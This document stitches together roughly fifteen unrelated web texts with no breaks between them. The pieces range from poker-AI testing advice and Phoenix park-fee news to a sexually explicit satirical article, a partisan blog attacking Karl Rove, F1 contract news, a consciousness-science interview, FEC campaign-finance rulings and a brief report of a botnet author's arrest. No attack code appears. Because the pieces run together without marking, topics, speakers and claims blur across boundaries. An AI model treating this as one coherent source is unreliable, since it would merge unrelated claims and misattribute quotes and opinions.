Ideally you would perform your testing by having human players play against the AI and trying to find problems with it .
Unfortunately , due to the random hands being dealt , it 's very easy for one player to simply get lucky and win the game with sub - par logic , or even flawed logic .
I 've found it takes at least ten games to begin to get a clear picture of the qualities of an AI player , and more like a hundred games to be really sure .
This often creates an unreasonably burden on the testing department , and introduces a very long delay in getting feedback on AI changes .
The solution is automated testing .
The AI should be set up so that different variants of AI can play against each other in a very high speed set of games .
You should also code a few simplistic poker AI 's into the mix , such as an AI that always goes all in , or another that simply always raises with a hand better than a pair of fives .
Then you set your AI loose against these opponents , and make sure that it wins the appropriate percentage of games .
If you coded your evaluation and simulation appropriately , then you should be able to simulate an entire game in about a second .
( You might want to reduce the iterations of the simulation a bit to speed up testing ) .
The best use of your human testers is to try to get them to find an exploit of the AI , then you can codify this exploit into a temporary AI opponent to include in your test suite .
You can then tweak your AI until it defeats the exploit , while still being able to defeat all the other ( standard ) opponents .
MORE WORK
What I 've set out here is just a foundation for poker AI .
By following the process laid out here you will get a reasonably strong and entertaining opponent .
Here 's a quick list of the topics you might want to look into
• Pre-flop hand strength tables
• Opponent modeling .
• Implied Odds .
• Personality modeling
• Positional play
• Probabilistic search space
• Game theory and Nash Equilibrium .
RESOURCES :
- Sklansky , David , The Theory of Poker , 1999 , Two Plus Two Publishing .
– Provides various discussion of pot odds , implied odds , etc , with many heuristics that might be useful .
- The University of Alberta Computer Poker Research Group :
http://www.cs.ualberta.ca/~games/poker/
A number of research papers on implementing poker AI .
- Hold 'em Killer , Evin Peretz , http://www.holdemkiller.blogspot.com/
– A blog on implementing poker AI .
- Poker -Eval , http://freshmeat.net/projects/poker-eval/ - A GPL Licensed poker hand evaluation library .
Phoenix 's plan to begin charging a fee to park at key entrances to mountain preserves has struck a nerve with trail users ranging from the Mountain Pointe High School cross country coach to a registered nurse who hikes to keep her weight and blood pressure down .
Protest photos |
City settles on $ 2 fee
" Two dollars to park here .
I heard about it yesterday , " griped Phoenix resident Donna Jones , a Maricopa Medical Center registered nurse who hikes the Pima Canyon trail of South Mountain Park three times a week to maintain her health .
" What are they going to provide for that $ 2 ?
More services ?
My car was already broken into at the park . "
Phoenix City Councilman Sal DiCiccio , who appears to be the city 's No. 1 opponent of the parking fee , was at the Pima Canyon entrance to the park before 8 a.m. Saturday .
He passed out fliers urging park users to " fight new park fees " and answered questions from hikers , runners and mountain bikers .
Many asked DiCiccio whether Phoenix would spend the revenue from the parking fee directly on improvements to parks .
Not necessarily , DiCiccio said .
The $ 500,000 the city expects to generate with the new Phoenix Mountain Pass - which will cost $ 2 a day or $ 50 for a six - month pass - will go into the city 's general fund to cover the cost of basic city operations .
City departments have been asked to find new ways to generate revenue because of the economic downturn .
Phoenix Parks and Recreation Director Dale Larsen said Friday that he has recommended that any money generated in excess of the $ 500,000 be used to make improvements to park facilities , staffing and hours .
How the city will enforce the fees has not been determined and enforcement will not go into effect until early 2011 , Larsen said .
The mountain pass program is expected to require vehicles parked at the Pima Canyon area of South Mountain Park , the Echo Canyon area of Camelback Mountain , Phoenix Mountains Park and Recreation Area , the Dreamy Draw Recreation Area and North Mountain Park to display the passes starting at the end of August .
The $ 2 cost might not sound like a big deal , but when one crunches the cost for an entire sports team that trains at a preserve , the numbers get high quickly .
Heather Kiser , a teacher and the cross country coach at Mountain Pointe High School in Ahwatukee , said members of her team train at Pima Canyon at least once a week - sometimes often more .
" Lots of college teams are out here training too , " she said .
DiCiccio said the hardship the fee could create for athletic teams is just one of many unintended consequences of the mountain pass program , which was approved by the Phoenix Parks and Recreation Board earlier this month .
He said he also anticipates complaints from neighborhoods where some preserve users will begin to park to avoid buying mountain passes .
The decision was made " very little public input , " DiCiccio said .
" There was very little thought put into how the program would work . "
On Thursday DiCiccio sent letters to parks board members asking them to rescind their decision .
In addition to being confusing and difficult to enforce , the mountain pass program would put an unfair burden on families who use the preserves as an inexpensive form of recreation , he said .
" We all recognize how much families and businesses are struggling with the current economy , " DiCiccio wrote .
" Those in the private sector have taken 10 to 25 percent compensation cuts . . .
Many have lost their jobs , their homes and their businesses .
Meanwhile , the city of Phoenix has dumped $ 100 million in new taxes and fees on them in the past nine months - while refusing to address its own unsustainable and exorbitant labor costs . "
DiCiccio's office has received about 100 calls and e-mails about the fee .
The majority have been negative , staff members said .
Larsen said the parks department has received about a dozen calls raising concerns about the fees .
But some callers and preserve users said they would willingly pay a parking fee - if there is a chance some of the money would go toward park improvements .
" Bring it on .
It 's a great idea , " said Earl Thornton , a Queen Creek music teacher , who sat observing a Pima Canyon drinking fountain that had been taken over by bees Saturday morning .
Thornton , a mountain biker , said he already pays an annual fee to use Maricopa County parks and does not think buying a $ 50 six - mouth pass from Phoenix would be hardship .
" I want the parking pass , " said Tempe resident Tom Cavaretta , a volunteer park steward at Pima Canyon .
" They have cut 10 rangers out here .
There is not enough staff .
Sometimes I am the only one here to help if someone gets hurt .
The city needs more money for the parks . "
But such opinions were in the minority at Pima Canyon Saturday morning .
" I think it 's ridiculous .
I 'm not going to pay it , " said Ahwatukee resident Andy Cary , an Ahwatukee resident who runs at Pima Canyon three days a week .
" We already pay taxes .
Now they are going to charge me to park in an area that I am already paying taxes for .
I 'll just park somewhere else . "
IAN HOOTON / Science Photo Library / Corbis
A black couple living in the U.K. were shocked by the birth of a blonde haired , blue - eyed girl .
Ben Ihegboro must have briefly questioned his wife Angela ’s fidelity after the birth of Nmachi , and he conceded : “ We both just sat there after the birth staring at her ” .
As there is no known mixed - race background in either of the parents ’ families , geneticists are baffled by the newborn ’s surprise appearance .
Nmachi is the couple ’s third child , with Dumebi , 2 , and Chisom , 4 , each bearing a strong resemblance to their parents .
Doctors rejected the possibility of the baby being albino .
The real cause is unknown , with the only explanation being a “ genetic quirk . ”
( See pictures of the first years of four babies . )
Professor Bryan Sykes , head of human genetics at Oxford University , described the birth as “ extraordinary , ” telling The Sun that for the baby to be completely white , both Ben and Angela would need to have “ some form of white ancestry . ’”
The explanation for this lies in that mixed - race women carry some eggs containing genes for white skin and others for black ; similarly men carry the same range of genes in their sperm .
( See pictures of pregnant belly art . )
Professor Sykes commented : “ The hair is extremely unusual .
Even many blonde children do n’t have blonde hair like this at birth . ”
Ben said that his son Chisom “ keeps coming to look at his sister and then sits down looking puzzled . ”
Well , Chisom , we ’re puzzled too !
( via The Sun )
– Zander Sharp
AUSTIN , TX — Area college students Chris Montez and Amy Hammond achieved orally stimulated orgasm Monday evening after a chance encounter at the Java Europa coffeehouse .
Amy Hammond and Chris Montez enjoy a spirited discussion of Beat poet Gregory Corso , laying the groundwork for heated cunnilingus .
Advertisement
Experts agreed that Java Europa , with its unique atmosphere of comfortable , easy - going lounging and vaguely left - leaning political and cultural sensibilities , was instrumental in the success of the coupling .
" It is a well - known fact that when acting in combination , handmade Andean wall hangings , the music of Billie Holiday and overpriced foreign beverages are excellent facilitators of the type of mutually satisfactory , gender - sensitive , non-threatening consensual oral sex experienced by these lucky youngsters Monday , " University of Texas sociology professor Richard Ammons said .
" That is to say , as opposed to the more traditional fumbling , awkward , guy - on - top , 90 - second type of sex generally brought on by a sports - bar environment . "
Advertisement
Montez , a junior in comparative literature , and Hammond , a sophomore in political science , were both " greatly pleased " by the evening 's events .
" I especially enjoyed the double mocha latte , " said Montez , 20 .
" It added a milieu , if you will , of continental sophistication to my late - night studying and was no doubt a key factor in my attracting Amy 's attention . "
Advertisement
" The conversation was also wonderful , " Montez added .
" But I must admit that while I enjoyed discussing Ginsburg and Burroughs with Amy , I was picturing her naked the entire time . "
Hammond , 19 , also had no complaints .
" By showing me that he was interested in my opinion on the literary merits of various Beat writers , " she said , " Chris established the level of confidence and trust necessary for me to enthusiastically grind my velveteen vulva against his handsome , slightly stubbled face . "
Advertisement
Though as of press time the two have no plans to ever see each other again , both agreed that the oral sex — as well as the worldly and sophisticated conversation and beverages that preceded it — was enriching and rewarding .
" It sure beats talking to some drunken frat guy who 's just trying to figure out which girl is most likely to let him in her pants , " Hammond said .
" I ought to know : My old boyfriend Brad was like that .
All he ever wanted was me to do was pleasure him .
He was never sensitive to my orgasmic needs , the way Chris was last night . "
Advertisement
Java Europa owner Pat Gunther said that Monday 's sexual encounter was not the first his coffeehouse had facilitated .
" Every day , people meet here and go on to enjoy casual , meaningless sexual romps , " she said .
" Whether it 's cunnilingus , fellatio , rimming or fisting , there 's something about this place that 's conducive to random consensual sex . "
Gunther noted that just last Friday , two strangers sat down together and discussed French theorist Michel Foucault before heading off to enjoy heated intercourse .
Advertisement
Jim Wiersma , who owns the Tru-Value hardware store next door to Java Europa , said that his shop has seen little of the sort of encounters familiar to the coffeehouse .
" We do n't get too many college students looking for serendipitous sexual dalliances here , " Wiersma said .
" Mostly we get middle - aged married men looking for extension cords and ratchets and paint primers , that sort of thing . "
Researchers are using nanotechnology to develop a medical dressing which will detect and treat infection in wounds .
Scientists at the University of Bath and the burns team at the Southwest UK Paediatric Burns Centre at Frenchay Hospital in Bristol are working together with teams across Europe and Australia to create an advanced wound dressing .
The dressing will work by releasing antibiotics from nanocapsules triggered by the presence of disease - causing pathogenic bacteria , which will target treatment before the infection takes hold .
The dressing will also change colour when the antibiotic is released , alerting healthcare professionals that there is infection in the wound .
This is an important step in treating burns patients , particularly children , where infections can lead to toxic shock syndrome , a potentially fatal condition .
The €4.5 million European Commission funded project is a collaboration of 11 partners across Europe and Australia coordinated by Dr Renate Förch , at the Max - Planck - Institute for Polymer Research ( Germany ) , which will develop the prototype dressing over four years .
advertisement
The Bacteriosafe project includes chemists , cell biologists , clinicians and engineers .
They will not only develop the dressing , but will also work with industry on a pre-pilot scale manufacturing process , so they could be available on the market within a few years after completion of the project .
University of Bath project leader , Dr Toby Jenkins said : " Your skin is normally home to billions of ' friendly ' bacteria , which it needs to stay healthy .
" The dressing is only triggered by disease - causing bacteria , which produce toxins that break open capsules containing the antibiotics and dye .
" This means that antibiotics are only released when needed , which reduces the risk of the evolution of new antibiotic - resistant super - bugs such as MRSA . "
Dr Amber Young , a paediatric burn specialist at the South West UK Paediatric Burn Centre , based at Bristol 's Frenchay Hospital , will be the clinical consultant on the project .
advertisement
She said : " We 're really excited about this project -- every day we see young children who are seriously ill from burns who would hugely benefit from this research .
" Many people do n't realise that a burn from a cup of tea can be deadly if it becomes infected .
" Conventional dressings have to be removed if the skin becomes infected , which slows healing and can be distressing for the child .
" This advanced dressing will speed up treatment because it is automatically triggered to release antibiotics only when the wound becomes infected , meaning that the dressing will not need to be removed , thereby increasing the chances of the wound healing without scarring .
" The colour change acts as an early warning system that infection is present , meaning we can treat it much faster , reducing the trauma to the child and cutting the time they have to spend in hospital . "
The dressing could also be used for other types of wound , such as ulcers or by the military on the battlefield .
The researchers have already tested fabric coated with the nanocapsules , which are just one millionth of a millimetre in size .
They have been shown to react specifically to harmful bacteria .
Over the next four years the European team will be working on integrating the colour change technology into a suitable dressing and looking at cost effective routes for industrial production .
Case study -- Baby Isambard Ebbutt
In September 2008 baby Isambard Ebbutt pulled a boiling hot cup of tea over himself causing 32 per cent burns across his face and body .
Isambard , who was just 13 - months - old , was rushed to Frenchay Hospital in Bristol where he was treated by a team of experts at the South West Regional Paediatric Burns Service .
Luckily Isambard 's skin healed fully and he did not need skin grafts .
His family took Isambard home to Ellacombe , in Torquay , Devon , ten days after he was admitted .
Natalie Ebbutt , a mum of six , said : " I thought he was going to die , I just wanted my baby to live so I wanted him to be in the best place .
" It is so poignant that a cup of tea can kill , but I do n't think that parents are aware of the damage that a cup of tea can do .
I see adults walking around all the time with hot drinks near children . "
Although Isambard recovered well from his burn , many children can develop potentially fatal infections after they are injured .
The new dressing to be developed by the Bacteriosafe team will help prevent and treat infections before they take hold .
Mrs Ebbutt said : " I knew that the biggest chance of losing my child was if an infection took hold but all I could do was cross my fingers and hope for the best .
" To think now that there is a possibility of avoiding serious infection and complications with this project is amazing . "
" It 's a very exciting breakthrough , I am now all too aware of the dangers and what can happen if a burns wound gets an infection , it 's devastating .
" There is never a day that goes by when we do n't think how lucky we are to have him in such a perfect condition and see his smiling face . "
Oh , look !
Karl Rove is admitting a mistake .
It seems that he regrets not spinning Iraq better , and is spilling his guts to the Wall Street Journal and anyone else who will publish it in an effort to rewrite the Bush Years to a kinder , gentler age .
His WSJ column title : My Biggest Mistake in The White House .
Actually , I can think of other mistakes that were much bigger than failing to lie better to the American people .
In classic Rovian spin , he writes :
Thus began a shameful episode in our political life whose poisonous fruits are still with us .
The next morning , Democratic presidential candidates John Kerry and John Edwards joined in .
Sen .
Kerry said , " It is time for a president who will face the truth and tell the truth . "
Mr. Edwards chimed in , " The administration has a problem with the truth . "
The battering would continue , and it was a monument to hypocrisy and cynicism .
All these Democrats had said , like Mr. Bush did , that Saddam Hussein possessed WMD .
Of the 110 House and Senate Democrats who voted in October 2002 to authorize the use of force against his regime , 67 said in congressional debate that Saddam had these weapons .
This did n't keep Democrats from later alleging something they knew was false — that the president had lied America into war .
What someone says and what someone knows are entirely different things .
As President , George W. Bush knew in 2002 -- before troops were sent to Iraq -- that Saddam Hussein did NOT possess weapons of mass destruction .
Salon :
On Sept. 18 , 2002 , CIA director George Tenet briefed President Bush in the Oval Office on top - secret intelligence that Saddam Hussein did not have weapons of mass destruction , according to two former senior CIA officers .
Bush dismissed as worthless this information from the Iraqi foreign minister , a member of Saddam 's inner circle , although it turned out to be accurate in every detail .
Tenet never brought it up again .
Those Democrats
Rove is desperately trying to rope into the Bush Boondoggle were never given the correct intelligence , of course :
Nor was the intelligence included in the National Intelligence Estimate of October 2002 , which stated categorically that Iraq possessed WMD .
No one in Congress was aware of the secret intelligence that Saddam had no WMD as the House of Representatives and the Senate voted , a week after the submission of the NIE , on the Authorization for Use of Military Force in Iraq .
The information , moreover , was not circulated within the CIA among those agents involved in operations to prove whether Saddam had WMD .
But Rove conveniently forgot to say that the Democrats who believed there were WMD in Iraq were relying upon the National Intelligence Estimate of 2002 without any additional information supplied by the CIA .
Rove 's timeline proves the cynicism of his " confession " :
On July 9 , 2004 , Mr. Graham 's fellow Democrat on Senate Intelligence , Jay Rockefeller , charged that the Bush administration " at all levels . . . used bad information to bolster the case for war . "
But in his remarks on Oct. 10 , 2002 , supporting the war resolution , he said that " Saddam 's existing biological and chemical weapons capabilities pose real threats to America . "
[ snip ]
Then there was Al Gore , who charged on June 24 , 2004 , that Mr. Bush spent " prodigious amounts of energy convincing people of lies " and accused him of treason , bellowing that Mr. Bush " betrayed his country . "
Yet just a month before the war resolution debate , the former vice president said , " We know that [ Saddam ] has stored away secret supplies of biological and chemical weapons throughout his country . "
The war resolution passed on October 11 , 2002 .
George W. Bush was briefed on September 18 , 2002 .
George W. Bush and the CIA were the only people who knew the truth .
It was willfully and deliberately concealed from the Representatives and Senators debating the war resolution nearly one month later .
In what could possibly be the most cynical and laughable part of Rove 's column , he says this :
The damage extended beyond Mr. Bush 's presidency .
The attacks on Mr. Bush poisoned America 's political discourse .
Saying the commander - in - chief intentionally lied America into war is about the most serious accusation that can be leveled at a president .
The charge was false — and it opened the way for politicians in both parties to move the debate from differences over issues into ad hominem attacks .
SEE ?
See how that works ?
All the teabagger nastiness , racism , ramped - up rhetoric , Senate constipation and ugly statements from the likes of half - governor Palin ?
It 's really all Democrats ' fault because they poisoned the well of political discourse !
In other words , it 's all our fault because those accusations are false .
But the accusations are true .
Remember these facts :
Bush was briefed on September 18 , 2002 by the CIA and was told at that time Iraq did not possess weapons of mass destruction .
possess weapons of mass destruction .
That briefing directly contradicted the National Intelligence Estimate Congress relied upon during the debate about the Iraq War .
Colin Powell also relied upon the National Intelligence Estimate to argue the case for war to the United Nations .
He was not told of the new information conveyed to President Bush either .
Because information was deliberately withheld from the Congress which contradicted the National Intelligence Estimate , military action against Iraq was authorized .
Remarkably , Rove seems to be inviting the Obama administration to relitigate crimes committed by the Bush Administration , since he admits that his one mistake was NOT revisiting that accusation and " relitigating " it .
At the time , we in the Bush White House discussed responding but decided not to relitigate the past .
That was wrong and my mistake : I should have insisted to the president that this was a dagger aimed at his administration 's heart .
What Democrats started seven years ago left us less united as a nation to confront foreign challenges and overcome America 's enemies .
Perhaps the Obama administration should take that last paragraph to heart , and turn some of the current populist anger back on those who richly deserve it .
After all , Mr. Rove has now rung the bell loudly .
Let freedom ring in response .
We should pull the dagger from the heart of the Bush administration and plunge a sword straight in , cutting out the abscess of lies and spin .
Relitigate , Mr. President .
Karl
Rove thinks you should .
Relitigate now .
Java software allows you to run applications called " applets " that are written in the Java programming language .
These applets allow you to have a much richer experience online than simply interacting with static HTML pages .
Advertisement
Java Plug - in technology , included as part of the Java 2 Runtime Environment , Standard Edition ( JRE ) , establishes a connection between popular browsers and the Java platform .
Java allows applications to be downloaded over a network and run within a guarded sandbox .
Security restrictions are easily imposed on the sandbox .
Many cross platform applications also require Java to operate properly .
put this in an empty doc on the first frame trace ( ' stage.stageHeight = ' + stage.stageHeight ) ;
if you publish with the bandwidth explorer open it shows the stageheight as 100 px less than it is .
- MaTT _______________________________________________
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive : http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com
http://training.figleaf.com
" They Have to Do the Right Thing or Else They ’re Going to Get Killed "
Mike Pintek of Pittsburgh radio station KDKA .
( Photo : KDKA )
Last year , we posted a piece about a couple of shock jocks in Detroit who thought it was funny to talk about throwing things at bicyclists .
This year , the hateful talk is coming over the airwaves from Pittsburgh .
Streetsblog Network member blog Reimagine an Urban Paradise has been following the story of a Pittsburgh DJ , Mike Pintek of KDKA , who made some ugly remarks about being " tempted " to hit people on bikes with his car .
The audio has been taken down , but here ’s a partial transcript of what Pintek said from Reimagine ’s author , Lolly :
" There are some bicyclists who are just these arrogant little dorks that think they can do anything they want because they ’re on a bicycle and ‘ we ’re being green and environmentally friendly ’…
" I have been thoroughly tempted — I have n’t done it ’ cause I ’m not going to do it —
I ’m not that kind of person … but I have been so tempted to just bump ’em .
" I have been so tempted to pull up behind them when they ’re doing this — you know spread out across the road — put my car in neutral , jam the accelerator down , race the engine and scare the living crap out of them .
" They ’ve got to stop being so arrogant about what they ’re doing .
They ’ve got to obey the rules .
They have to do the right thing or else they ’re going to get killed . "
This all is playing out in a city where several bicyclists have been attacked in recent weeks by gangs of kids , as reported by Bike PGH .
Reimagine ’s Lolly has this to say about what she thinks the consequences should be for the DJ :
Driver ’s licenses are a privilege , not a right and if a person announces their desire to use their vehicle as a weapon , they should lose their license .
If they use their job to incite others to commit violence , they should lose that job .
She also notes that in the case of a San Francisco driver who allegedly did target people on bikes and used his vehicle as a weapon , the charges are felony attempted murder .
PGH Is a City and WWVB have more .
Apparently Pintek is going to talk about what he said on his show today .
We ’ll keep an eye on it .
On another note entirely , we ’d like to thank the folks at the Top Online Engineering Degree blog for including Streetsblog.net on their list of Top 50 Blogs for Civil Engineers to Read .
It ’s a terrific list that we ’re looking forward to digging into .
You should definitely check it out .
And we ’re honored to be included .
For decades Apple was the underdog .
Now its following , which began almost as a cult , has made it the world ’s largest tech company .
But has Apple become a victim of its own success ?
When I returned to my family last weekend even my mum knew about the iPhone 4 ’s reception saga – it was mainstream news .
Would this have been the case if the issue had been detected on a Nokia handset ?
Regardless , I doubt that ‘ antennagate ‘ will have a long - lasting impact on Apple .
The pitch forks may stab around for a while , but soon they ’ll be placed back in their respective sheds .
There ’s a negative buzz around Apple
Importantly though , the Apple iPhone ’s buzz score ( a balance based on consumer ’s positive and negative comments ) has sunk from May ’s 35.5 to a pitiful 2.2 in July .
Even the number of people willing to recommend the handset has halved .
And it was n’t the iPhone 4 ’s reported problems that really shook the brand – it was the way Apple dealt with them .
Telling users to hold their phone in a different way and deleting negative comments from its forums began to turn Apple into the Big Brother company it once despised .
The company ’s CEO , Steve Jobs , was seen as the Apple of so many eyes , but of late he ’s come across as slightly defensive .
Has the Apple turned sour ?
Sure , giving out free iPhone 4 bumper cases is a positive step , but it looks like the bigger Apple gets , the more villainous Jobs becomes .
Yet Apple ’s profits have n’t changed – in fact they reached epic proportions in the company ’s last quarter .
And with the iPhone 4 being Apple ’s most successful product launch , ‘ hold it the wrong way ’ comments will soon ripen into long lost fairy tales .
Love , hate , but never indifferent
There ’s an old adage that says brands want to be loved , do n’t mind being hated , but indifference spells disaster .
Recent events might make some of us despise the brand , but at least we ’re taking part .
And although the iPhone assimilation may momentarily slow down , Apple ’s loyal fans will always stand by .
At the iPad launch , Stephen Fry told me that the frenzy surrounding it was akin to a new album release from Lady Gaga .
A duff single is n’t going to destroy the love affair – so I do n’t doubt Apple ’s recovery will be swift .
Roll on the next Apple iPhone .
What 's your opinion of Apple following its iPhone 4 issues ?
I could n't care less .
( 43 % , 256 Votes ) I 've always loved Apple and I still love it .
( 31 % , 187 Votes ) I 've always hated Apple and I still hate it .
( 15 % , 91 Votes ) I used to love Apple , but now I hate it .
( 8 % , 47 Votes ) I used to hate Apple , but now I love it .
( 3 % , 18 Votes ) Total Voters : 599
QR Code Link to This Post
dogs are OK - wooof
Location : EMU / Ypsilanti
it 's NOT ok to contact this poster with services or other commercial interests
Water included ( must be melted by occupant . )
Includes hole in roof for bonfires to prevent asphyxiation .
Neighborhood security provided free by campus police .
$ 200 a month OBO .* Landlord not responsible for property melting .
W. Cross Ave at Normal St.
Red Bull Racing have confirmed rumours that they have signed Mark Webber onto a one year contract extension which see ’s him tied to the current championship leading team until the end of 2011 .
Webber had been linked with a move to Ferrari or Renault following his recent good form , and incidents with team mate Sebastian Vettel , who is contracted to the team until 2012 although that may be extended until 2015 .
Vettel and Webber ’s fraught relationship came to a head in Turkey where the pair ran into each other causing Vettel to retire from the race , the team were on for a 1 - 2 finish .
“ It was an easy decision to remain with Red Bull Racing .
We began talking very early this year and were in a position to sign by the Barcelona Grand Prix .
“ The decision to extend for a further year was a mutual one ; it ’s widely known that I ’m not interested in hanging around in Formula 1 just for the sake of it and at this stage of my career , I ’m happy to take one year at a time . ”
Webber said this morning .
“ I continue to feel very comfortable here – I have a fantastic relationship with the whole team and the factory at Milton Keynes feels like home .
It ’s been incredible to be part of the team as it ’s moved forward from a mid-field competitor to one that is challenging for the Championship .
“ I hope we experience more success together in the future and achieve our ultimate goal of winning the world championship . ”
Team principal Christian Horner added : “ The decision to retain Mark was very straightforward .
He is an important member of our team and is currently in the best form of his career , as the current leader of the drivers ’ championship .
The team is extremely happy that the driver pairing of Mark and Sebastian will remain unchanged for a third season in 2011 . ”
Ferrari now hold the cards to change the driver market , but it looks likely they will retain Felipe Massa and Renault will retain Robert Kubica .
F1 Fanatics
Consciousness is the last outpost of pure mystery in our scientific understanding of the brain .
We are learning ever more about the brain 's physiology and how it controls our bodies , but the idea of where " we " exist , how we develop that sense of self and how it can be explained in terms of the activity of brain cells , all of that is still largely the domain of philosophers rather than scientists .
Anil Seth , co-director of the Sackler Centre for Consciousness Science at the University of Sussex , wants to turn that around .
The recently opened institute will include neuroscientists , psychiatrists , roboticists , philosophers and a hypnotist .
Using brain - scanners and computer algorithms , they will measure , model and characterise what consciousness might be at a physiological level .
Seth and his co-director Hugo Critchley then want to take the findings into the clinic , using these ideas to explain whether altered states of consciousness might explain ( and help treat ) psychiatric conditions .
Why have scientists been so reluctant to study consciousness until now ?
A hundred years ago , consciousness was at the heart of psychology , and it was only excluded following the advent of behaviourism , which focused scientific efforts only on what could be observed objectively — behaviour , not experience .
But now we recognise it 's OK to take people 's descriptions of their conscious experiences as proper scientific data .
The study of consciousness may also have been retarded by people worrying about what the philosopher David Chalmers called the " hard problem " .
This says , let 's say we can understand everything about how the brain works , we know how you generate behaviour and perceptions ... but we would still have no idea why there was anything like experience generated by this stuff .
In other words , why is there consciousness in the universe at all ?
Nowadays , more of us realise that we do n't need to answer that " why ? " question to make a lot of progress .
Consciousness exists , we know when we 're conscious and when we 're not , and what we 're conscious of .
We can start to study those differences in the same way physicists have made progress without worrying about why there 's a universe in the first place .
What do we know so far ?
We know quite a lot about which brain mechanisms are necessary : you can get rid of quite large parts of the brain without seeming to affect consciousness .
For example , you can lose large parts of the cerebellum and it does n't seem to affect your conscious experience .
But if you lose small parts of the brain , say parts of the thalamus , you lose consciousness forever .
Is consciousness something you can localise to parts of the brain or is it more likely that the senses network together to create it ?
Consciousness , since it 's generated by the brain , is not likely to be localisable to one region .
It 's likely to be a distributed process that 's going to largely depend on the thalamocortical system , which is a big chunk of the brain but , by no means , all of it .
Do you need to define consciousness before you go looking for it ?
There is this idea that , to study something scientifically , you need to have a really explicit definition of it before you get going .
But I do n't think that 's true .
With consciousness , you can define it with various levels of specificity .
You can distinguish between conscious level — the scale between being completely asleep or in a coma and being completely aware and awake , say — and conscious content , which would be the actual components of a given experience .
So , if you were looking at cup of tea .
Things that are relevant to conscious level might not be relevant to conscious content .
There 's another important distinction between primary consciousness – the raw components of an experience – and what people call higher - order or reflexive consciousness , or even self - consciousness .
This is the part of our experience that maps onto our concept of " I " .
There is an experiencing subject for all these experiences we 're having .
How will your work be used by doctors ?
There has n't always been as much communication between psychiatry and neuroscience as one might have expected .
That 's changing now .
One reason is that psychiatrists are increasingly interested in the possibility of finding biomarkers for psychiatric disorders .
Right now , psychiatric disorders are classified on the basis of symptoms presented in the clinic .
There is , in most cases , no other reliable way of making a psychiatric diagnosis .
That difficulty maps to treatments as well , which are often based primarily on alleviating symptoms .
By thinking of psychiatric disorders as disturbances of conscious experience , and trying to understand the mechanisms that might generate particular patterns you see , you have a new way to diagnose and treat them .
One example comes from schizophrenia , where one of the symptoms is this misattribution of thoughts and actions , so that the person thinks they are being controlled by something else – by the TV or aliens .
One possible explanation for that is , our normal experience of thinking and behaving is unproblematic because we can predict the sensory consequences of our own actions .
A thought is just like an action that stays in the brain , so if we can predict what 's going to happen when we have a thought or perform an action , then we know that they 're not caused by anything else .
But if our predictions are awry , possibly because our internal timing mechanisms are screwed up , we might not be able to predict the consequences of our own actions so the brain is then forced to find some other cause for these things that are happening .
So it 's possible that underlying some of the symptoms seen in schizophrenia , there might be a disorder of making fine time judgments or predictions .
What clinical work will you focus on first ?
One phenomenon we 're studying is depersonalisation , a fascinating condition where the world or the self loses its subjective reality .
There 's evidence that those brain areas responsible for integrating external perceptions with internal ones are less active in people with depersonalisation .
We want to extend this work into clinical contexts such as the early stages of schizophrenia .
Do you think that consciousness will be reducible by science ?
In terms of how the world works , ontologically , consciousness must be .
Otherwise , something dualistic is going on , there 's something about consciousness that 's different from the universe that is not part of the natural world .
Consciousness is dependent on the laws of physics , chemistry and biology and we may not know all of those laws yet but we 're not going to need anything else .
The right level at which to explain the phenomenon is a different question .
I 'm less confident that the right level to explain how brains generate consciousness is going to be at the level of this neurotransmitter or this molecule or something like that .
It may turn out that the best explanation comes at a higher level .
the final mashup album is now on kickstarter
For months , lawyers and constitutional scholars have debated the effects of Citizens United vs. FEC .
Now the Supreme Court ’s monumental January decision that reversed a decade of campaign finance law is finally having an effect on the ground , and the results are clear — labor unions and corporations have more freedom to make political speech .
The Federal Election Commission issued two advisory opinions Thursday that will give greater freedom to corporations and labor unions in making contributions to political committees that are not tied to any particular party or candidate .
“ It necessarily follows that corporations , labor organizations and political committees also may make unlimited contributions to organizations … that make only independent expenditures , ” wrote the commission .
The FEC advised that Commonsense Ten , a non-connected political committee with Democratic leanings , may receive “ unlimited contributions from individuals , political committees , corporations , and labor organizations for the purpose of making independent expenditures , ” according to the advisory opinion .
Campaign finance cheat sheet Independent expenditures : a communication expressly advocating the election or defeat of a candidate that is not made in cooperation with a candidate , a candidate ’s authorized committee or a political party
a communication expressly advocating the election or defeat of a candidate that is not made in cooperation with a candidate , a candidate ’s authorized committee or a political party Citizens United v. FEC : Supreme Court ruling in January that permits corporations and labor organizations to use treasury funds to make independent expenditures in connection with federal elections and to fund electioneering communications .
Commonsense
Ten intends to make only independent expenditures , spending that is not coordinated with any party or candidate .
The FEC also wrote that the political committee created by the Club for Growth , a nonprofit promoting economic freedom , “ may solicit and accept unlimited contributions from individuals in the general public , including contributions given for specific independent expenditures , ” according to the advisory opinion .
The Club for Growth committee will not accept contributions from any political committee , candidate , labor organization , foreign national , government contractor or corporation .
Many conservatives praised the Citizens United decision as a victory for free speech , but Democrats quickly moved to limit the decision ’s effects by passing the DISCLOSE Act through the House of Representatives .
“ The FEC is not doing anything radical here , ” said Hans von Spakovsky , senior legal fellow at the Heritage Foundation .
“ They are merely putting in place what the Supreme Court has ruled . ”
Not everyone agreed with the process of using an advisory opinion to make such a sweeping decision .
FEC Chairman Steven Walther dissented , arguing that no court has gone against current FEC rules that cap contributions to political committees at $ 5,000 annually or any contributions from corporations or labor organizations .
“ No court …has invalidated these provisions of the Act or Commission regulations , ” Walther wrote .
“ It is not best practice for the Commission to announce that a political committee may ignore a statutory provision duly enacted by Congress where no court has held that provision to be invalid . ”
The FEC cited a recent decision by the U.S. Court of Appeals in the District of Columbia that ruled that “ contribution limits are unconstitutional ” when applied to individuals ’ donations .
“ I think unions will take advantage of this more than corporations , since they are consistently among the top 20 spenders directly to candidates , ” von Spakovsky said .
WATCH : MASSACHUSETTS TOWN BANS BOTTLED WATER
Botnet hacker caught in Slovenia Published duration 28 July 2010
image caption
The FBI described the capture of Iserdo as a " huge break " in the ongoing Mariposa investigation .
A computer hacker known as Iserdo has been arrested in Slovenia .
The 23 - year - old is believed to have written the program behind the mariposa virus , also known as butterfly .
The botnet , one of the world 's largest , was dismantled earlier this year after infecting 12.7 million computers .
It was designed to steal personal financial details and was also found in the PCs of banks and major companies .
Officials from around the world have been chasing the cyber criminals .
In December 2009 , three people believed to have been running it were arrested in Spain .
